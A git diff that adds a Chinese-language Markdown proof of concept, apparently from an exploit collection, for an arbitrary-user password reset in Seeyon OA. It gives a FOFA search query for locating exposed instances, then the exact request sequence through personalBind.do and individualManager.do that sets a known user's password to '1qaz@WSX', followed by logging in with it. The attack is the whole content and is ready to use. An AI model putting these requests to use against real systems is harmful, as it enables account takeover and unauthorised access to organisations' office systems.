diff --git a/致远前台任意用户密码修改.md b/致远前台任意用户密码修改.md
new file mode 100644
index 0000000..3d85d99
--- /dev/null
+++ b/致远前台任意用户密码修改.md
@@ -0,0 +1,27 @@
+## 致远前台任意用户密码修改
+
+## fofa
+```
+app="致远互联-OA"
+```
+
+## 漏洞复现
+前提需要知道用户名
+
+`http://xx.xx.xx.xx/seeyon/personalBind.do?method=retrievePassword`
+
+<img width="1057" alt="image-20240301101704702" src="https://github.com/wy876/POC/assets/139549762/9562a165-151e-421c-a26c-7e09bf199368">
+
+`http://xx.xx.xx.xx/seeyon/personalBind.do?method=sendVerificationCodeToBindNum&type=validate&origin=zx`
+
+<img width="1047" alt="image-20240301101722837" src="https://github.com/wy876/POC/assets/139549762/c1ea9e86-1a92-4aaa-945d-a1a45c83509e">
+
+修改密码为`1qaz@WSX`
+
+`http://xx.xx.xx.xx/seeyon/individualManager.do?method=resetPassword&nowpwd=1qaz@WSX`
+
+<img width="1217" alt="image-20240301101802224" src="https://github.com/wy876/POC/assets/139549762/5375cccc-0a9b-4ae0-8e3e-177aa67290b1">
+
+最后使用修改的密码登录
+
+<img width="1054" alt="image-20240301101840756" src="https://github.com/wy876/POC/assets/139549762/261afdc9-a728-4302-96a6-e0e19d02d338">